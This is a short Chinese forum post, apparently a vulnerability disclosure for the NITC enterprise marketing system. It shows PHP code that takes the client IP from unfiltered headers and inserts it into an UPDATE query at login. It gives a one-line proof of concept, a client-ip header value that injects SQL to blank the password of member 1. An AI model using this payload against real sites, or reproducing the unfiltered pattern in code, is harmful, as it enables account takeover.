NITC企业智能营销系统
[AppleScript] 纯文本查看 复制代码 function getip( )
{
if ( isset( $_SERVER ) )
{
if ( isset( $_SERVER[HTTP_X_FORWARDED_FOR] ) )
{
$realip = $_SERVER[HTTP_X_FORWARDED_FOR];
return $realip;
}
if ( isset( $_SERVER[HTTP_CLIENT_IP] ) )
{
$realip = $_SERVER[HTTP_CLIENT_IP];
return $realip;
}
$realip = $_SERVER[REMOTE_ADDR];
return $realip;
}
if ( getenv( "HTTP_X_FORWARDED_FOR" ) )
{
$realip = getenv( "HTTP_X_FORWARDED_FOR" );
return $realip;
}
if ( getenv( "HTTP_CLIENT_IP" ) )
{
$realip = getenv( "HTTP_CLIENT_IP" );
return $realip;
}
$realip = getenv( "REMOTE_ADDR" );
return $realip;
}
ip获取没有进行过滤,导致网站多处sql注入
[AppleScript] 纯文本查看 复制代码 if ( $action == "login" )
{
....
$ip = getip( );
$_SESSION['member_email'] = $email;
$_SESSION['member_id'] = $result['member_id'];
$_SESSION['state'] = $result['state'];
$_SESSION['member_name'] = $result['name'];
$site->table( "member" )( "update ".$site->table( "member" ).( " set last_ip='".$ip."',last_time='" ).date( "Y-m-d H:i:s", time( ) )."' where member_id=".$result['member_id'] );
}
此处 用户登录的时候,记录用户登录IP操作,由于update用户数据,可以直接利用sql注入update任意用户的密码。
POC: head头上加入 client-ip:',password='' where member_id=1#
解决方案:
过滤
| 
发表于 2014-12-24 15:03:41
发表于 2014-12-24 16:45:14
